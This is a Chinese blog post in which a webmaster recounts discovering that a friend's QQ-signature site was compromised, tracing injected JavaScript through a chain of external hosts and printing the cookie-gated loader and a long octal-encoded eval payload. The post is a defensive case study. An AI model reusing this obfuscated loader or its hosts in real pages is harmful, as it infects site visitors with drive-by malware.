键词优化的QQ个性签名么?一开始以为只是杀软误报,加上我也没有装杀毒软件(一直没中过病毒),所以就没怎么管他?
今天起来用新手机((*^__^*) 嘻嘻……,俺买了黑莓8100)打开百度搜索一下QQ个性签名,晕,排名不知道掉到第几页了。我就郁闷了,自己的SEO优化一直都是很温柔的上的啊,怎么会被降权了?于是就猜想可能真的被挂马了,因为是也算是刚认识的朋友,当然要帮忙处理一下这些琐碎的问题啦。回来之后,马上启用德国杀软小红伞,“滴滴”两声,打开QQ个性签名的时候报警了。于是打开html代码查看,既然没有iframe,这就奇怪了。于是清理缓存再次打开网页,根据小红伞提供的资料找到了报警的文件:info[1].js,打开得到下面的代码:
var az=document.cookie;
var za=az.indexOf(”qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);
document.cookie=”qqqq=web;expires=” expires.toGMTString();
document.writeln(””);window.status=” “;}
我想问题应该出在js代码上,于是在代码搜索js,一个是51la的统计的js,另外一个是div.js,51la的自然可以排除,所以我就打开div.js,然后看到了下面“此地无银三百两”的网址代码(红色字体的),一路跟踪下去,果然发现可疑迹象。
// JavaScript Document
function showdiv(divnum,divbefor,id){
for(i=1;i<=divnum;i ){
try{
if(i==divbefor){
document.getElementById(id i).style.display=”inline”;
}else{
document.getElementById(id i).style.display=”none”;
}
}catch(e){ }
}
}
function menuFix(){}
document.writeln(””);
跟踪代码:http://xishiyi.com/images/main/info.js
firefox直接输入,转换得到地址如下http://www.91q.org/templets/images/div.js打开代码如下:
var az=document.cookie;
var za=az.indexOf(”qqqq”);
if(za!=-1){}else{var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);
document.cookie=”qqqq=web;expires=” expires.toGMTString();
document.writeln(””);window.status=” “;}
继续iframe跟踪:http://kkwwkkc.cn/10/zz.htm
打开代码如下:
继续iframe跟踪:http://kkwwkkc.cn/10/123.htm
打开得到如下王八代码:
eval(”1441571431651551451561645616716215116414550427415114616214115514540167151144164150756260401501451511471501647560401631621437514615414116315056150164155767457151146162141155145764251731512144157143165155145156164561671621511641455042741511461621411551454016715114416415075616060401501451511471501647560401631621437514116356150164155767457151146162141155145764251731512167151156144157167561631641411641651637542556146102042731512167151156144157167561571561451621621571627514616515614316415115715650511731621451641651621564016416216514573175151215114650156141166151147141164157162561651631451621011471451561645616415711415716714516210314116314550515615115614414517011714650421551631511454067425175755561511512144157143165155145156164561671621511641455042741511461621411551454016715114416415075626040150145151147150164756040163162143756164561501641557674571511461621411551457642517315121641621711731661411624014673151216614116240147147751561451674010114316415116614513011714215214514316450421071141111051041571671565611110510415716715656614251731751512143141164143150501465117317573404040404040404040404040404040404040404040401512146151156141154154171173151146501464175421331571421521451431644010516216215716213542511731441571431651551451561645616716215116414550427415114616214115514540167151144164150756160604015014515114715016475604016316214375154172561501641557674571511461621411551457642517317517515121641621711731661411624015573151216614116240150150751561451674010114316415116614513011714215214514316450421041571671561541571411441451625610411415714114414516256614251731751512143141164143150501555117317573404040404040404040404040404040404040404040401512146151156141154154171173151146501554175421331571421521451431644010516216215716213542511731441571431651551451561645616716215116414550427415114616214115514540167151144164150756160604015014515114715016475604016316214375163151156141561501641557674571511461621411551457642517317517515121641621711731661411624015673151216614116240154154751561451674010114316415116614513011714215214514316450421631561601661675612315614116016315015716440126151145167145162401031571561641621571545661425173175151214314116414315050156511731757340404040404040404040404040404040404040404040151214615115614115415417117315114650156417542133157142152145143164401051621621571621354251173144157143165155145156164561671621511641455042741511461621411551454016715114416415075616060401501451511471501647560401631621437515714614615114314556150164155767457151146162141155145764251731751751512164162171173166141162401427315121661411624015515575156145167401011431641511661451301171421521451431645042116103124101165144151157106151154145625610116514415115710615115414562566242517317515121431411641431505014251173175734040404040404040404040404040404040404040404015121461511561411541541711731511465014241754213315714215214514316440105162162157162135425117314415714316515514515616456167162151164145504274151146162141155145401671511441641507561606040150145151147150164756040163162143751161031241011651441511571061511541455615016415576745715114616214115514576425173175175151214616515614316415115715640164145163164505115121731512162162157157170170407540421111051224240534042120103164154561114240534042105122120424053404210316415456614273151216416217115121731512114151153145407540156145167401011431641511661451301171421521451431645016216215715717017051731512175143141164143150501451621621571625117316214516416516215673175151216616616616616640754011415115314556120154141171145162120162157160145162164171504212012211710412510312412610512212311111711642517315121511465016616616616616674754266566056616456656562425115121441571431651551451561645616716215116414550427415114616214115514540167151144164150756160604015014515114715016475604016316214375162145616056150164155767457151146162141155145764251731512145154163145151214415714316515514515616456167162151164145504274151146162141155145401671511441641507561606040150145151147150164756040163162143751621456161561501641557674571511461621411551457642517315121751512164145163164505173″)
鄙人才疏学浅,看不懂转化了的代码啥意思,不想去转换,知道被挂马就ok了,最后是跟朋友说让他去掉那个代码,清理缓存重新打开网页,ok,没问题了。
写这篇文章的用意在意告诉各位,要注意自己网站的安全,如果发现挂马,不要错过每一个细节,首先仔细检查html页面有没有调用其他莫名的网站的东西,然后仔细分析自己页面的js代码,iframe是黑客们最常用的手段。实例一篇,希望对各位有用。这是我第一次抓马,经过自己的分析既然抓到了,很开心,特此分享……